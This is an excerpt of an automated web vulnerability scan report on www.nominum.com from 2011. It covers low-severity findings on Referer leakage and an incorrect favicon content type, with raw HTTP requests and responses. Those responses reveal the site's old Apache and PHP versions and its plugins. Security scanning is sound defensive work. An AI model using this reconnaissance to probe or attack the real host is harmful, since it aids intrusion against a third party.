Cache-Control: max-age=31356000, must-revalidate
Connection: close
Content-Type: application/x-javascript
Content-Length: 46897

var $rotateoptions = new Array();
$rotateoptions[2] = new Array();
$rotateoptions[2]["style"] = "tabs";
$rotateoptions[2]["rotate"] = 0;
$rotateoptions[2]["random_start"] = 0;
$rotateoptions[2]["start
...[SNIP]...
<title>Nothing found for Wp-content Plugins Tabbed-widgets Tabbed-widgets Php4e9d9(a)7887aa701e1?returnjs=true&amp;ver=3 0</title>
...[SNIP]...

2. Cross-domain Referer leakage  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.nominum.com
Path:   /

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.

Request

GET /?s=dns+ip+cidr&searchsubmit=Find HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Referer: http://www.nominum.com/?s=xss&searchsubmit=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.2.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:05:08 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: http://www.nominum.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 43162

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">
<head profi
...[SNIP]...
<span><a rel="nofollow" href="http://www.facebook.com/share.php?u=" class="ilsb ilsb-facebook" title="Share on Facebook">Facebook</a>
...[SNIP]...
<p id="wp-exec-php-footer" style="margin:0 auto 0 auto;font-size:0.8em;padding:0 0 7px 0;text-align:center;">Powered by <a href="http://tom-thorogood.gotdns.com/wordpress-plugins/wp-exec-php/" target="_blank">WP exec PHP</a>
...[SNIP]...

3. Content type incorrectly stated  previous

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.nominum.com
Path:   /wp-content/themes/nominum/images/favicon.ico

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Issue background

If a web response specifies an incorrect content type, then browsers may process the response in unexpected ways. If the specified content type is a renderable text-based format, then the browser will usually attempt to parse and render the response in that format. If the specified type is an image format, then the browser will usually detect the anomaly and will analyse the actual content and attempt to determine its MIME type. Either case can lead to unexpected results, and if the content contains any user-controllable data may lead to cross-site scripting or other client-side vulnerabilities.

In most cases, the presence of an incorrect content type statement does not constitute a security flaw, particularly if the response contains static content. You should review the contents of the response and the context in which it appears to determine whether any vulnerability exists.

Issue remediation

For every response containing a message body, the application should include a single Content-type header which correctly and unambiguously states the MIME type of the content in the response body.

Request

GET /wp-content/themes/nominum/images/favicon.ico HTTP/1.1
Host: www.nominum.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=74794381.229242997.1316134100.1316134100.1316134100.1; __utmb=74794381.1.10.1316134100; __utmc=74794381; __utmz=74794381.1316134100.1.1.utmcsr=stopbadware.org|utmccn=(referral)|utmcmd=referral|utmcct=/home/faq

Response

HTTP/1.1 200 OK
Date: Thu, 15 Sep 2011 15:04:56 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Wed, 18 Aug 2010 01:41:25 GMT
ETag: "42c53a-37e-29df5b40"
Accept-Ranges: bytes
Content-Length: 894
Connection: close
Content-Type: text/plain

..............h.......(....... ......................................................................................................................................................._UE...............
...[SNIP]...

Report generated by XSS.CX at Thu Sep 15 19:54:28 GMT-06:00 2011.